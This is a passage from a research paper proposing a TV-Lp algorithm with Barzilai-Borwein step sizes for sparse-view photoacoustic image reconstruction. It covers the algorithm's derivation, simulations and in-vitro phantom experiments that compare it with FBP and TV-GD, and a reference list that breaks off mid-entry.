Barzilai-Borwein step parameter in k th iteration.\n\nAfter using the Barzilai-Borwein method to determine the step size δ, the optimization problem in equation (13) can be transformed into three sub-problem as follows:\n\n$ω i k + 1 = min ω i ω i 2 + ρ 2 ω i - D i u k - b i k 2 2 + δ k 2 α ω i - ω i k 2 2 , z i k + 1 = min z i z i p p + ρ 2 z i - Ψ i T u k - c i k 1 2 + δ k 2 β z i - z i k 2 2 , u k + 1 = min u αρ D u - ω k + 1 2 2 + βρ Ψ T u - z k + 1 2 2 + δ k u - u k - δ k - 1 A T A u k - f 2 2 , b i k + 1 = b i k - ω i k + 1 - D i u k + 1 , c i k + 1 = c i k - z i k + 1 - Ψ i T u k , δ k + 1 = A u k + 1 - u k 2 2 / ω k + 1 - ω k 2 2 + z k + 1 - z k 2 2 + u k + 1 - u k 2 2$\n(17)\n\nwhere ω i k is the finite difference approximations to partial derivatives of u at the i th pixel along the coordinate in k th iteration respectively, z i k is the sparse coefficient of the i th pixel in k th iteration respectively; δ k+1 is the Barzilai-Borwein step parameter in (k + 1)th iteration.\n\nWe use the soft shrinkage operator to obtain the solution to ω-subproblem in equation (17), the operation is as follows:\n\n$ω i k + 1 = max a 1 t 1 + a 2 t 2 a 1 + a 2 - 1 a 1 + a 2 , 0 1 / a 1 + a 2 1 / a 1 + a 2 a 1 = D i u k + b i k a 2 = ω i k t 1 = ρ t 2 = δ k / α i = 1 , 2 … N$\n(18)\n\nwhere a 1, a 2, t 1 and t 2 are the variables used for a succinct expression.\n\nAs for the z-subproblem in equation (17), we use the soft p-shrinkage operator to solve it. The operator is defined by:\n\n$z i k + 1 = max a 3 t 3 + a 4 t 4 a 3 + a 4 - 1 a 3 + a 4 a 3 t 3 + a 4 t 4 a 3 + a 4 1 - p , 0 1 / a 3 + a 4 1 / a 3 + a 4 a 3 = Ψ i T u k + c i k a 4 = z i k t 3 = ρ t 4 = δ k / β i = 1 , 2 … N$\n(19)\n\nwhere a 3, a 4, t 3 and t 4 are the variables used for a succinct expression.\n\nThe u-subproblem in equation (17) is a typical least squares problem. The solution can be easily obtained by:\n\n$u k + 1 = F T F αρ D T ω k + 1 + βρ Ψ T z k + 1 + δ k u k - A - 1 A u k - f αρ F T D T DF + βρ I + δ k I$\n(20)\n\nwhere F is the Fourier transform matrix.\n\nAs a result, the TV- L p algorithm is summarized as follows:\n\n$u k - u k - 1 u k <ϵ$\n(21)\n1. (1)\n\nInitialization: input f, α, β, ϵ ,p and ρ. Set the reconstructed image u0 = 0, b = c = 0, δ0 = 1, k = 0.\n\n2. (2)\n\nApply equation (18) and (19) to update the value of ω and z.\n\n3. (3)\n\nApply equation (20) to update the value of u.\n\n4. (4)\n\nApply equation (17) to update the value of b, c and δ.\n\n5. (5)\n\nIf the exiting condition is met, end the iterations and output the result. Otherwise repeat the step from (2) to (4). The exiting condition is as follows:\n\n## Simulation\n\nTo verify the effectiveness of the proposed TV- L p algorithm on PAI reconstructions, the simulations are designed. All the simulations are performed in Matlab v7.14 on a PC with a 3.07 GHz Intel Xeon processor (only 1 core is used in computation) and 32 GB memory. The sparsisfying operator Ψ is set to Haar wavelet transform using Rice wavelet toolbox. The sound speed is set to be consistent in the simulation as 1500 m/s.\n\n### Sparse-view reconstruction\n\nIn the simulation, we choose the Shepp-Logan phantom to be the initial pressure rise distribution. The forward simulation and inverse reconstruction are all performed in 2D. The phantom is shown in Figure 1. The measurements from the phantom are generated by using equation (2). The size of the phantom is 89.6 mm × 89.6 mm, the radius of the scanning circle is 42 mm and the size of the reconstructed image is 128 pixels × 128 pixels. During the simulation, the scanning circle covers 360°around the imaging phantom. Four different measurements are collected. The scanning step of tomographic angels is set to 2.25°, 4°, 12° and 20° respectively. So the sampling points are 160 views, 90 views, 30 views and 18 views correspondingly.\n\nThe parameters α, β, ϵ and ρ are set to be 1 × 10-2, 1 × 10-2, 1 × 10-5 and 1 respectively. The influence of these parameters will be discussed later. And the parameter p are set to be two different values as 0.5 and 0.8.\n\nWe choose the FBP , the L 1-norm and the TV-GD algorithms to be the comparison besides our proposed TV- L p algorithm. The simulation results by using these different algorithms are shown in Figure 2. It’s worthwhile to note that the weight used in the TV-GD algorithm is an adaptive parameter, as same as it is reported in . The negative values in FBP reconstructed image are set to be zero.\n\nIt is shown in the first column of Figure 2 that, all three iterative algorithms have comparable reconstruction results when the sampling data is sufficient. Moreover, it is shown in Figure 2(a) that the contrast of FBP reconstructed image is not as high as the other three. But its resolution is comparable with the others visually. When the number of sampling points reduces, the qualities of the reconstructed images are strongly affected in the FBP reconstruction. When the sampling point gets sparse in the FBP reconstruction, the arc-like artifacts appears due to the back-projection arcs cannot be canceled out with each other. The iterative algorithms can provide better qualities of the reconstructed images than the FBP method in sparse-view reconstructions. Among them, the L 1-norm method struggles to depress the noise. Meanwhile, the TV-GD algorithm and the TV-L p algorithm provides high-resolution images and have no visually distinguishable decline in qualities of the reconstructed images as the number of sampling points decreases.\n\nAs for the extreme sparse sampling points situation (18-view and 30-view), the image reconstructed by the FBP algorithm, shown in Figure 2(d), has extremely severe artifacts. The L 1-norm reconstruction and the TV-GD algorithm have a decline in image qualities. The noise in the reconstructed images by the L 1-norm reconstruction, as shown in Figure 2(j), cannot be depressed effectively. As for the TV-GD algorithm, the reconstruction produces piecewise artifacts which also make the qualities of the reconstructed images decrease. In the TV-L p image, the noise is depressed more effectively than the above three algorithm. The quality of the reconstructed image is not affected substantially by the insufficient sampling data.\n\nWe calculate the peak signal-to-noise ratios (PSNR) of the reconstructed images with the original phantom as a gold standard to provide a numeric quantification of the results. The bigger the value of PSNR is, the better quality of the image is. The PSNR is defined as:\n\n$PSNR=10 log 10 XY ⋅ MAX ∑ i , j = 1 X , Y u i , j - t i , j 2$\n(22)\n\nwhere t(i,j) means the gray-value of the original image, MAX the maximum possible pixel value of the image which in our simulation is 1.\n\nWe calculate the value of the PSNR of all images in Figure 2. The quantitative results are shown in Table 1.\n\nFrom Table 1, it is shown that the PSNR of the FBP algorithm is always in a very low level due to its unsuitability for sparse-view sampling condition. As for those three compressed sensing based algorithms, the PSNR value of images reconstructed by the TV-L p algorithm are the highest. The L p - norm optimization constraint can provide the better performance in the extremely sparse sampling. With this improvement, the TV-L p algorithm is more accurate than other algorithms in the sparse-view sampling condition shown in the quantitative results. Between the two different value of p, the parameter p that is set to be 0.5 has a slightly advantage against the other one. Also it is revealed from Table.1 that the 90-view shows higher PSNR than 160-view. When the sampling points are sufficient, it is possible that the fewer-view projection can produce better reconstruction results. But their PSNR is very close with same algorithm. It is fair to say that the results are on the same level of image quality.\n\nFrom Figure 2, it is shown that the TV-GD image and the TV-L p image are very close in the image quality. Here we choose the FORBILD phantom , a more complicated and more challenging phantom, to further compare the proposed algorithm with the TV-GD algorithms. The phantom is shown in Figure 3. The scanning step of tomographic angels is set to 2.25°, 4°, 6° and 12°. So the sampling points are 160 views, 90 views, 60 views and 30 views correspondingly. The other numerical implementation conditions remain the same with the shep-logan simulation. The simulation results by using the TV-GD algorithms and the proposed TV- L p algorithm are shown in Figure 4. It is shown in Figure 4 that, when the sampling data is sufficient, both algorithms can reconstruct the accurate image. When the sampling angles get sparse during the simulation, it is seen that the TV-GD reconstruction results in paintinglike staircase artifacts in the smooth regions. Also it fails to give the accurate image in the low contrast regions in the top and left of the phantom. The proposed algorithm provides reasonably good reconstructions in these regions. The PSNR of the reconstructed images are shown in Table 2. From this table, we observe that the TV-L p algorithm provides the better PSNR for all the cases. In the case of more complicated phantom, the TV-L p algorithm shows significant improvement than the TV-GD algorithm.\n\nAlso, we include a line-plots image of the reconstruction result by the TV-GD algorithm and the TV-L p (p = 0.8) algorithm from 30-view data. The location of the pixel profile in the image is displayed in Figure 5(a). The comparisons of pixel profiles are displayed in the Figure 5(b).\n\nIn Figure 5(b), the solid line and the dotted line represent the pixel profiles of the TV-L p and the TV-GD image respectively. It is shown in Figure 5(b) that the TV-L p can reconstruct the image more precisely than the TV-GD one. The edges from the TV-L p are sharper than that from the TV-GD. The pixel number from 90 to 100 is the high resolution area, the TV-L p image shows the high-speed change of the pixel value while the TV-GD fails to do so. In the continuous area, the TV-L p image is smoother.\n\nWe continuously decrease the number of the detect points try to find the limit density of the sampling points. During the simulation, we set the criterion of acceptability that the PSNR of the reconstructed image reaches 30 dB. It is found out that the total number of the sampling points is able to be reduced to 15 for TV-L p algorithm in the reconstruction of shep-logan phantom and to 18 for the forbild phantom.\n\nIn this part, the TV-L p algorithm is proved to be more accurate and stable than the other algorithms for PAI image reconstruction in the sparse sampling condition.\n\n### Convergence and calculation\n\nIn this part, we discuss the theoretical calculation complexity and study the convergence of the proposed algorithm. As mentioned above in ‘Theory and method’, in step (2) the update of ω and z is using the soft shrinkages and the computational costs are both O(N). The update of z also includes a wavelet transforms which computational costs are O(N logN). In step (3), the update of u involves two fast Fourier transforms which computational costs are O(N logN) and two operations of A with the computational costs of O(NMQ). The update of the parameters b and c in step (4) are all simple calculations with the computational costs of O(N). As for the paremeter δ, although it involves an operation of A, it can use the result computed in the step (3). So its computational cost is also O(N).\n\nIn a nutshell, the calculation complexity of the proposed algorithm in one iteration is 5O(N) + 4O(N logN) + 2O(NMQ). The first two terms is much smaller than the last term in the practical use of photoacoustic imaging and most iterative algorithm is with the operation. In each iteration, we just use the projection matrix twice. So the proposed algorithm has a cheap per iteration computation.\n\nThe TV-GD algorithm is reported as an efficient and stable iterative algorithm in photoacoustic imaging. In the ‘Sparse-view reconstruction’, its reconstruction result is closest to the proposed algorithm. So here we select it to be a comparison with the TV-L p algorithm. We calculate the time cost of those two algorithms in a simulation. The simulation condition is same as in ‘Sparse-view reconstruction’. But the iteration ends when the PSNR values reach 30 dB. The result is shown in Table 3. From Table 3, it is shown that the proposed algorithm is faster than TV-GD algorithm in the computational time. Based on this result, it could be inferred that the TV-L p algorithm is a more efficient image reconstruction algorithm comparing to the TV-GD algorithm. The value of p has also some influence on the time cost. The smaller the p is, the more iteration times are needed to reach the reconstruction result.\n\nThanks to the use of Barzilai-Borwein step size selection method, the convergence speed can also be significantly improved. For the quantitative analysis, we use a parameter that represents the distance between the reconstructed image and the original phantom image. The parameter d is defined as:\n\n$d= ∑ i = 1 X ∑ j = 1 Y u i , j - t i , j 2 ∑ i = 1 X ∑ j = 1 Y t i , j 2 1 / 2$\n(23)\n\nwhere u is the reconstructed image and t is the original image. The size of the image is X × Y. The smaller the parameter d is, the closer the reconstructed image is with the original phantom. In the TV-L p algorithm, there is a small rate of chance that the optimization will lead to the wrong solution due to its non-convex nature. So we use the original image to calculate the parameter d to show the image quality and use the parameter d as a reference. We want to show the improvement of the image quality in every iteration step.\n\nThe simulation condition is set to be the same as in ‘Sparse-view reconstruction’. The sampling view is 60. The parameter p is set to be 0.8. The defined distance d is calculated after each iteration step. If the distance is smaller than 0.05, the iteration will stop. The simulation result is shown in Figure 6. The x-axis is the value of distance and the y-axis is the iteration times. The line ‘·-’ refers to the TV-GD algorithm and the line ‘*-’ represent the TV-L p (p = 0.8)algorithm. The result is shown in Figure 6. The images reconstructed by TV-L p algorithm in each iteration have smaller value of d than the TV-GD ones and the TV-L p iteration only takes 9 times as the distance is met the request.\n\nFor discussions noted above, it can be surmised that the convergence of TV-L p algorithm is faster and the TV-L p has a cheaper computational cost.\n\n### Robustness to the noise\n\nIn the practical applications of the photoacoustic tomography, the measurements are usually polluted by those white measuring noises from the ultrasound transducer and the system electronics. Hence, it is very important for an algorithm to maintain stable performance under the noises polluted circumstances. To analyze the robustness of the TV-L p algorithm, we choose 30-view simulated photoacoustic signals that we used in ‘Sparse-view reconstruction’. The signals are added with white noises of different noise power levels. We use TV-L p algorithm with two different settings of parameter p (p = 0.5 and p = 0.8) and TV-GD algorithm to reconstruct images from these white noise polluted measurements.The reconstruction results are shown in Figure 7. In the first row to the last row of the Figure 7, the signal to noise ratio (SNR) of the polluted measurements is 10 dB, 5 dB, 3 dB and 0 dB, respectively. As shown in the image, when the power level of the noises is not very strong (10 dB and 5 dB), the reconstructed images by using the noisy measurements have basically no obviously difference with the ones reconstructed with the noiseless signals. As the noise becomes stronger, the quality of the reconstructed images decreases.\n\nWe also plot the profiles of a pixel line in order to show the detail qualities of reconstructed images clearly. In Figure 7, the dotted line and the solid line are the pixel profiles of the reconstructed image and the original image, respectively. From the line plots, it is revealed that the proposed algorithm has better performance in the edge preservation and more accurate in the smooth area. We calculated the PSNR of the reconstructed image. The result is shown in Table 4. Our algorithm outperformed the TV-GD algorithm in any noise power level. Giving the credit to the optimal conditions, the reconstructed image is intended to be continuous and sharp. During the iteration, the photoacoustic signals get enhanced and the noise is suppressed.\n\nAs we can see from the table that the TV-L p algorithm reconstructed images have a slightly better performance than the TV-GD algorithm when it comes to the image qualities. When the noise is extremely strong (0dB), the TV-L p algorithm has a huge advantage than the TV-GD one in image quality. As for the different settings of parameter p in the TV-L p algorithm, there is no major difference that can be observed between the two images. The PSNRs of the p = 0.5 setting is about 0.3 dB bigger than the p = 0.8 setting in the first three noise power level. But when the noise getting extremely strong (0 dB), the p = 0.8 setting is 0.1 dB bigger than the p = 0.5 setting in PSNR value.\n\nFrom this part of simulation we can conclude that our TV-L p algorithm is robust to noise and has a better performance than the TV-GD algorithm in the noisy measurement circumstance.\n\n### Parameter investigation\n\nAs the original optimization problem of the image reconstruction is described in Eq. (14), the TV-L p algorithm contains some parameters that are tunable, which are α, β, ϵ, p and ρ. In those parameters, the choice of ρ does not affect the performance of the TV-L p algorithm theoretically. The result of the simulation also shows that the image quality is not sensitive to the parameter ρ for a large range. Here we set the parameter ρ to a steady value 1. The ϵ is the exiting condition parameter. It can be easily deduced that smaller ϵ will leads to slightly more accurate reconstructed image at the cost of more iteration times. In this part we focus on analyzing the parameter settings of p, α and β.\n\n### Parameter setting of p\n\nIn the TV-L p algorithm, we replace the L 1 norm with the L p norm (0 < p ≤ 1). It is reported in Ref. that theoretically fewer measurements are required for accurate reconstruction in the L p norm situation. But it also leads to failure in solving the optimization problem. It’s kind of a dilemma for the setting of p. So here we take different values of p to see its influence to the image reconstruction. The parameter α and β are both set to be 1 × 10-2.\n\nWe choose the 90-view and 18-view simulated photoacoustic signals that we used in ‘Sparse-view reconstruction’. We set the p value as 0.3, 0.5, 0.8 and 1. We calculate the reconstructed images’ PSNR value. It is shown in Table 5. When the p is set as 0.5, it has advantage in the quality of the reconstructed image. However, when the value of p continues to reduce to 0.3, there is no obvious improvement in image quality. But in the same time, the smaller the p is, the higher probability of the solving failure is during the simulation. The reduction of p leads to the increasing of the iteration times in our simulation. So taking these two factors into account, we set the p as 0.8 so that it can provide a great reconstruction performance and stability with a fast convergence.\n\n### Parameter settings of α and β\n\nAs we describe above in Eq. (14), the parameter α and β are parameters corresponding to the weights of TV value and L p norm value in this optimization problem respectively. We use these two parameters to balance the terms of the objective function. With different kinds of the objective image, the settings of those two parameters are different. Here we select three different images as the given optical energy deposition to test the universality of our algorithm and present further investigation of the parameter settings. We select a phantom that stand for the vessels and a phantom of dots with different energy degree in the simulation. We also choose a real brain MRI as the original optical energy deposition to demonstrate the performance of the proposed algorithm in reconstructing extremely detailed and complex structured imaging object. Here the TV-GD algorithm is used as a comparison. There are four groups of parameter settings, which are (α = 1 × 10-2, β = 5 × 10-3) , (α = 1 × 10-2, β = 1 × 10-2), (α = 5 × 10-2, β = 5 × 10-3) and (α = 5 × 10-3, β = 5 × 10-3). The reconstructed images are shown in Figure 8. From first row of Figure 6, we can see in the reconstruction of gradient sparse phantom. The TV based algorithm has great performance when the image demonstrate piecewise continuous behavior. All reconstructions are accurate and the background noise is suppressed well. When it comes to the images with the vessel phantom (Figure 8 (g)-(l)), those original optical energy depositions are a little bit more complex than the dots. The reconstruction results show that the image reconstructed by TV-L p algorithm is better than the TV-GD ones. As in Figure 8(h), TV-GD image has some noises in the background and the edge of the vessel is blurred. While the TV-L p images with different parameter settings both have high-resolution results. As for the real MRI image, it has very detailed information. As expected, both two groups of parameter setting α = β have the most accurate result among them. The increasing weighting of L p -norm condition can provide more detail information and prevent the reconstructed image emerging plantlike artifacts. The details such as edges and fine structures are well preserved in both reconstructions. The reconstruction results show that the TV-GD reconstructed image has severely paintinglike staircase artifacts with some loss in fine details. From our observation, TV-L p algorithm with the parameter setting α = β preserves the fine features better than the TV-GD one. α and β are the regularization parameters determining the trade-off between the data consistency and the sparsity. It is revealed from the above simulation that the parameter setting α = β is a better strategy. In this parameter setting, the TV-L p algorithm provides a 3 dB improvement in the PSNR over the TV-GD algorithm based on our calculation.\n\n### Limited-view and irregular-view simulation\n\nIn the real application of PAI, due to the restrains of the shape or the size of the imaging object, a full angular scanning sometimes is hard to achieve. We evaluate the performance of the TV-L p method in limited-view case, line-view case and un-equal-view case.\n\nThe simulation setup and the reconstructed image is shown in Figure 9. In the limited-view simulation (Figure 9(a)), the scanning angular range is set to 150° and the angular step is 3°, so 50-view photoacoustic signals are obtained. In the line-view simulation (Figure 9(c)), the transducer array with 60 transducers is placed in the right side of the imaging object and the interval between two transducer elements is 1.49 mm. It is revealed in Figure 9(b) and Figure 9(d) that the quality of the TV-L p reconstruction is not much affected by the limitation of the sampling angle. Because the sampling angle is limited, the information definite is partly missed, yet the TV-L p method can still provide a satisfying reconstruction. In un-equal angel step scanning, we randomly choose 30 sampling points from a 60-view projection and use these 30-view un-equal angle step data for image reconstruction. The result is shown in Figure 9(f). As we can see from the image, the reconstruction result can still maintain a very high quality.\n\n## In-vitro experiments\n\n### Experiment setup\n\nWe carry out the experiments on in-vitro signals to demonstrate the proposed TV-L p algorithm’s performance in the practical application.\n\nThe framework of the experiment platform is shown in Figure 10. In this platform, an Nd:YAG laser generator (Continum, Surelite I) is used to emit the laser pulse. The wavelength of the laser is 532 nm. A single laser pulse is generated at the frequency of 10 Hz and last 6-7 ns. The incident laser pulse is emitted towards the top of the phantom through a concave lens with the diameter of 5 cm. The setup of the lens enlarges the illumination area and lead to the pulse energy reduction in the illumination area. The energy is about 6.47 mJcm-2, which is lower than the ANSI laser radiation safety standard (20 mJcm-2) . Signal acquisition is done by a water-immersion ultrasound transducer (Panametric, V383-SU). The transducer is a linearly unfocused one at 3.5 MHz (-6 dB bandwidth at 45%). A digital stepping motor (GCD-0301 M) is used to rotate the ultrasound transducer around the phantom placed in water. The scanning radius is 38 mm. The received analog ultrasound signals are amplified by a pulse receiver (Panametric, 5900PR). An oscilloscope (Agilent, 54622D) with the sampling frequency of 16.67 MHz is set to transform the received signals into digital ones. Both the laser generator and the digital motor are controlled by the computer through the serial interface. The transformed digital data is transported to the computer through the general purpose interface bus (GPIB).The imaged phantom we used in the experiment is made by gelatin cylinder. It is shown in Figure 11. There are two different phantoms. The radius of the phantom is 25 mm. The left one is made by two rubber bars with 1 mm diameter that embedded as the optical absorbers. The right one utilizes leaf which pretends as vein and tissue as the optical absorbers.\n\nIn the experiment, the transducer tends to measure the photoacoustic signal in-plane only, and the reconstruction is also in 2D. The cross-sectional image in any plane is mainly determined by the measured data in the same plane, and a set of circular measurement data on the same plane would be sufficient to reconstruct a good image. We use the deconvlution calculation before the reconstruction to eliminate the transducer’s impulse response influence.\n\n### Experiment result\n\nIn the experiment, 90-view and 30-view data are collected for reconstruction. The images are constructed by the FBP, the TV-GD and the TV-L p algorithms, respectively. The reconstruction results are shown in Figure 12. The left column of the Figure 12 is reconstructed from 90-view data. When the sampling data is sufficient, all three algorithms are effective. With respect to the locations and sizes, the optical absorbers are all well reconstructed in the figure. While the FBP reconstructed image is not as clear as the images reconstructed by the iterative algorithms. When we reconstruct the image with a small of sampling angles (right column of Figure 11), the artifacts start to emerge in the FBP reconstructed image and the quality of the image is severely affected. But the TV-GD and the TV-L p algorithms can still provide high-contrast images with less noise. In Figure 12(f), it is shown that the image reconstructed by the TV-L p algorithm outperforms other algorithms in image contrast and noise suppression. The structure of optical absorbers is clear and the noise in the background is well-suppressed. The sparse-view of sampling has barely any influence on the quality of the TV-L p reconstructed image.\n\nIn vitro imaging of a leaf vein is also performed to further demonstrate the advantages of the TV-L p algorithm. The reconstruction result is shown in Figure 13. As the structure of the phantom is more complex, the FBP are deeply influenced by the artifact and fail to reconstruct the accurate image both under 90-view and 30-view sampling circumstance. It is shown in the figure, that the TV-GD and TV-L p algorithms can still reconstruct the image in a high contrast level. But when the data is insufficient, there is some noise emerging in the background. TV-L p algorithms can suppress the noise better than the TV-GD one. The optical absorber in TV-L p one is more distinct than that in the image by TV-GD algorithm.\n\n### Quantitative comparisons\n\nWe use the L 1-norm algorithm to reconstruct the image of 180-view data from the leaf vein phantom. As the sampling view is efficient, the reconstructed image is used as a “standard” one. We calculate the histograms of the difference between the reconstructed one and the “standard” one as shown in Figure 14. Figure 14 (a)-(c) are the difference histograms between the standard and the images reconstructed by the FBP, the TV-GD and the TV-L p , respectively, with 30-view data. In Figure 14, two CS-based algorithms have a large number of pixels with small ranges of difference with the standard one, which suggests that these two algorithms can reconstruct the image more accurately. In the case of the TV-L p algorithm, the major part of the pixel difference is in the range from 0 to 0.1. From this experiment, the results demonstrate that the TV-L p method can outperform the TV-GD one in the field of the image quality.\n\nFrom the experiment result noted above, it is safe to say that the TV-L p algorithm would have better performance in sparse-view PAI than other algorithms. It could provide stable and accurate reconstruction in both sufficient data sampling and sparse-view sampling situation.\n\n## Conclusion\n\nAiming to reduce the scanning time and enhance the imaging quality of the photoacoustic image reconstruction, we proposed the TV-L p algorithm that applies the total variation method and nonconvex optimization method to the PAI. The main idea of the algorithm is to apply L p -norm nonconvex optimization along with the total variation method. In the proposed algorithm, the Barzilai-Borwein step size selection method is adopted to provide faster convergence and smaller calculation. The effectiveness and universality of the algorithm is demonstrated through the numerical simulations. The numerical simulations show that the TV-L p algorithm provides good imaging quality in sparse-view sampling situation. The algorithm convergence, the robustness to noise and the tunable parameters are also discussed. The simulation result reveals that the TV-L p algorithm is a stable image reconstruction method with fast convergence and small computational cost. The TV-L p algorithm is further investigated through some experiments using gelatin-made phantom. Compared with the result of other popular image reconstruction method, the TV-L p imaging algorithm has significant advantage on contrast and noise suppression. From the discussion noted above, it could be concluded that the TV-L p algorithm may be a practical algorithm for sparse-view photoacoustic imaging reconstruction.\n\n## Abbreviations\n\nPAI:\n\nPhotoacoustic imaging\n\nTV-L p :\n\nTotal variation and Lp-norm\n\nOAT:\n\nOptoacoustic tomography\n\nTAT:\n\nThermoacoustic tomography\n\nFBP:\n\nFiltered back-projection\n\nTV:\n\nTotal variation\n\nTVM:\n\nTotal variation minization\n\nASD-POCS:\n\nTV-GD:\n\nMRI:\n\nMagnetic resonance imaging.\n\n## References\n\n1. 1.\n\nWang LV: Tutorial on photoacoustic microscopy and computed tomography. IEEE J Sel Top Quantum Electron 2008,14(1):171–179.\n\n2. 2.\n\nXu M, Wang LV: Photoacoustic imaging in biomedicine. Rev Sci Instrum 2006,77(4):041101–1-041101–22.\n\n3. 3.\n\nLi C, Wang LV: Photoacoustic tomography and sensing in biomedicine. Phys Med Biol 2009,54(19):R59-R97. 10.1088/0031-9155/54/19/R01\n\n4. 4.\n\nWang LV: Prospects of photoacoustic tomography. Med Phys 2008,35(12):5758–5767. 10.1118/1.3013698\n\n5. 5.\n\nKruger RA, Reinecke DR, Kruger GA: Thermoacoustic computed tomography—technical considerations. Med Phys 1999,26(9):1832–1837. 10.1118/1.598688\n\n6. 6.\n\nKruger RA, Liu P, Fang Y, Appledorn CR: Photoacoustic ultrasound (PAUS)-reconstruction tomography. Med Phys 1995,22(10):1605–1609. 10.1118/1.597429\n\n7. 7.\n\nGuo B, Li J, Zmuda H, Sheplak M: Multyfrequency microwave-induced thermal acoustic imaging for breast cancer detection. IEEE Trans Ultrason Ferroelectr Freq Control 2007,54(11):2000–2010.\n\n8. 8.\n\nPramanik M, Ku G, Li C, Wang LV: Design and evaluation of a novel breast cancer detection system combining both thermoacoustic (TA) and photoacoustic (PA) tomography. Med Phys 2008,35(6):2218–2223. 10.1118/1.2911157\n\n9. 9.\n\nZhang EZ, Laufer JG, Pedley RB, Beard PC: In vivo high-resolution 3D photoacoustic imaging of superficial vascular anatomy. Phys Med Biol 2009,54(4):1035–1046. 10.1088/0031-9155/54/4/014\n\n10. 10.\n\nNiederhauser JJ, Jaeger M, Lemor R, Weber P, Frenz M: Combined ultrasound and optoacoustic system for real-time high-contrast vascular imaging in vivo . IEEE Trans Med Imaging 2005,24(4):436–440.\n\n11. 11.\n\nZerda A, Paulus YM, Teed R, Bodapati S, Dollberg Y, Khuri-Yakub BT, Blumenkranz BS, Moshfeghi DM, Gambhir SS: Photoacoustic ocular imaging. Opt Lett 2010,35(3):270–272. 10.1364/OL.35.000270\n\n12. 12.\n\nXu M, Wang LV: Time-domain reconstruction for thermoacoustic tomography in a spherical geometry. IEEE Trans Med Imaging 2002,21(7):814–822. 10.1109/TMI.2002.801176\n\n13. 13.\n\nXu M, Xu Y, Wang LV: Time-domain reconstruction algorithms and numerical simulations for thermoacoustic tomography in various geometries. IEEE Trans Biomed Eng 2003,50(9):1086–1099. 10.1109/TBME.2003.816081\n\n14. 14.\n\nXu Y, Feng DZ, Wang LV: Exact frequency-domain reconstruction for thermoacoustic tomography—I: Planar geometry. IEEE Trans Med Imaging 2002,21(7):823–828. 10.1109/TMI.2002.801172\n\n15. 15.\n\nXu Y, Xu M, Wang LV: Exact frequency-domain reconstruction for thermoacoustic tomography—II: Cylindrical geometry. IEEE Trans Med Imaging 2002,21(7):829–833. 10.1109/TMI.2002.801171\n\n16. 16.\n\nXu M, Wang LV: Pulsed-microwave-induced thermoacoustic tomography: Filtered back-projection in a circular measurement configuration. Med Phys 2002,29(8):1661–1669. 10.1118/1.1493778\n\n17. 17.\n\nXu M, Wang LV: Universal back-projection algorithm for photoacoustic computed tomography. Phys Rev E 2005,71(1):016706–1-016706–7.\n\n18. 18.\n\nZhang C, Wang Y: Deconvolution reconstruction of full-view and limited-view photoacoustic tomography: a simulation study. J Opt Soc Am A 2008,25(10):2436–2443. 10.1364/JOSAA.25.002436\n\n19. 19.\n\nZhang C, Li C, Wang LV: Fast and robust deconvolution-based image reconstruction for photoacoustic tomography in circular geometry experimental validation. IEEE Photonics J 2010,2(1):57–66.\n\n20. 20.\n\nLiao CK, Li ML, Li PC: Optoacoustic imaging with synthetic aperture focusing and coherence weighting. Opt Lett 2004,29(21):2506–2508. 10.1364/OL.29.002506\n\n21. 21.\n\nModgil D, Rivière PJ: Implementation and comparison of reconstruction algorithms for 2D optoacoustic tomography using a linear array. Proceedings of SPIE 6856:2008; San Jose 2008, 68561D-1–68561D-12.\n\n22. 22.\n\nZhang J, Anastasio MA, Riviere PJ, Wang LV: Effects of different imaging models on least-squares image reconstruction accuracy in photoacoustic tomography. IEEE Trans Med Imaging 2009,28(11):1781–1790.\n\n23. 23.\n\nPaltauf G, Viator JA, Prahl SA, Jacques SL: Iterative reconstruction algorithm for optoacoustic imaging. J Acoust Soc Am 2002,112(4):1536–1544. 10.1121/1.1501898\n\n24. 24.\n\nJose J, Willemink R, Steenbergen W, Slump C, van Leeuwen T, Manohar S: Speed-of-sound compensated photoacoustic tomography for accurate imaging. Med Phys 2012, 39: 7262–7281. 10.1118/1.4764911\n\n25. 25.\n\nHuang C, Wang K, Nie L, Wang LV, Anastasio M: Full-Wave Iterative Image Reconstruction in Photoacoustic Tomography With Acoustically Inhomogeneous Media. IEEE Trans Med Imaging 2013,32(6):1097–1110.\n\n26. 26.\n\nProvost J, Lesage F: The application of compressed sensing for photo-acoustic tomography. IEEE Trans Med Imaging 2009,28(4):585–594.\n\n27. 27.\n\nGuo Z, Li C, Song L, Wang LV: Compressed sensing in photoacoustic tomography in vivo . J Biomed Opt 2010,15(2):021311–1-021311–6.\n\n28. 28.\n\nRosenthal A, Jetzfellner T, Razansky D, Ntziachristos V: Efficient framework for model-based tomographic image reconstruction using wavelet packets. IEEE Trans Med Imaging 2012,31(7):1346–1357.\n\n29. 29.\n\nMeng J, Wang LV, Ying L, Liang D, Song L: Compressed-sensing photoacoustic computed tomography in vivo with partially known support. Opt Express 2012,20(15):16510–16523. 10.1364/OE.20.016510\n\n30. 30.\n\nMeng J, Wang LV, Ying L, Liang D, Song L: In vivo optical-resolution photoacoustic computed tomography with compressed sensing. Opt Lett 2012,37(22):4573–4575. 10.1364/OL.37.004573\n\n31. 31.\n\nYao L, Jiang H: Photoacoustic image reconstruction from few-detector and limited-angle data. Biomed Opt Express 2011,2(9):2649–2654. 10.1364/BOE.2.002649\n\n32. 32.\n\nYao L, Jiang H: Enhancing finite element-based photoacoustic tomography using total variation minimization. Appl Optics 2011,50(25):5031–5041. 10.1364/AO.50.005031\n\n33. 33.\n\nWang K, Su R, Oraevsky AA, Anastasio M: Investigation of iterative image reconstruction in three-dimensional optoacoustic tomography. Phys Med Biol 2012,57(17):5399–5423. 10.1088/0031-9155/57/17/5399\n\n34. 34.\n\nZhang Y, Wang Y, Zhang C: Total variation based gradient descent algorithm for sparse-view photoacoustic image reconstruction. Ultrasonics 2012,52(8):1046–1055. 10.1016/j.ultras.2012.08.012\n\n35. 35.\n\nChartrand R: Exact reconstruction of sparse signals via nonconvex minimization. IEEE Trans Signal Proc Let 2007,14(10):707–710.\n\n36. 36.\n\nMajumdar A, Ward RK: An algorithm for sparse MRI reconstruction by Schatten p -norm minization. Magn Reson Imaging 2011,29(3):408–417. 10.1016/j.mri.2010.09.001\n\n37. 37.\n\nMajumdar A: Improved dynamic MRI reconstruction by exploiting sparsity and rank-deficiency. Magn Reson Imaging 2013,31(5):789–795. 10.1016/j.mri.2012.10.026\n\n38. 38.\n\nMa S, Yin W, Zhang Y, Chakraborty A: An efficient algorithm for compressed MR imaging using total variation and wavelets. Proceedings IEEE Conference on Computer Vision Pattern Recongnition: 2008; Anchorage 2008, 1–8.\n\n39. 39.\n\nYe X, Chen Y, 